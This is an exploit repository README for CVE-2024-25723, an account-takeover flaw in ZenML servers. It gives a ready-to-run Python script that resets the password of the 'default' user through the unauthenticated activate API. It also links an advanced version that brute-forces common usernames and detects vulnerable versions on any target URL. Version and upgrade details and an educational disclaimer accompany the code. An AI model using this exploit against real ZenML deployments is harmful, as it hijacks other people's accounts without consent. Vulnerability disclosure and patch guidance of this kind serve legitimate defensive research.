# Exploit for CVE-2024-25723

This repository is dedicated to addressing CVE-2024-25723, a critical security vulnerability in ZenML, with an educational Proof of Concept (PoC) provided to illustrate the issue and encourage prompt mitigation. The PoC demonstrates how an unauthorized user could potentially exploit the vulnerability to take ownership of any ZenML accounts.

## Proof of concept (PoC)

1) Start the ZenML server through docker.
   
`docker run -it -d -p 8080:8080 --name zenml zenmldocker/zenml-server:0.46.0`
 
2) Save the code below as "exploit-CVE-2024-25723.py" and then run "python exploit-CVE-2024-25723.py".
```python
import requests

base_url = "http://localhost:8080"
user = "default"
new_password = "3gx9AbzP92rfHhZ"

activate_api_url = f"{base_url}/api/v1/users/{user}/activate"
activate_api_headers = {"Content-Type": "application/json"}
activate_api_json={"password": new_password}
activate_api_response = requests.put(activate_api_url, headers=activate_api_headers, json=activate_api_json)
print(activate_api_response.json())
```

3) If the default user called "default" is registered and ZenML is on a vulnerable version, the exploit will be executed successfully and the new password for this account will be: "3gx9AbzP92rfHhZ" (for the exploit to work, it is necessary to know the name of the target user).

## Advanced exploit

The difference between PoC and the advanced exploit is that the advanced exploit bruteforces the most used usernames and is also capable of detecting whether the version is vulnerable or not through an API that leaks the ZenML version. To use the advanced exploit save the following code to a file:

https://github.com/david-botelho-mariano/exploit-CVE-2024-25723/blob/main/advanced-exploit-CVE-2024-25723.py

The command to run this exploit is:

`python3 advanced-exploit-CVE-2024-25723.py https://example.com`

## Affected Versions:
All ZenML versions below 0.46.7 are vulnerable, with the exception of the following patch versions: (0.44.4, 0.43.1, 0.42.2).

## Immediate Action Required:
Upgrade to the latest version (0.46.7 or above) or one of the patched versions (0.44.4, 0.43.1, 0.42.2) to mitigate this risk.

## Disclaimer

The Proof of Concept (PoC) provided in this repository is for educational and security research purposes only. The information and code are intended to be used by cybersecurity professionals and researchers to understand and protect against vulnerabilities in software and systems. Any use of this PoC, related information, or code for attacking targets without prior mutual consent is illegal and strictly prohibited.

By using this PoC, you agree that you understand the potential impact of the vulnerability it demonstrates and that you will use it responsibly and ethically. The authors of this PoC disclaim any liability for any misuse of this material or any damages that may occur from using the information and code provided. It is the end user's responsibility to obey all applicable local, state, national, and international laws.

The authors have made every effort to ensure the accuracy and reliability of the information provided in this repository. However, the information is provided "as is" without warranty of any kind. The authors do not accept any responsibility or liability for the accuracy, content, completeness, legality, or reliability of the information contained.



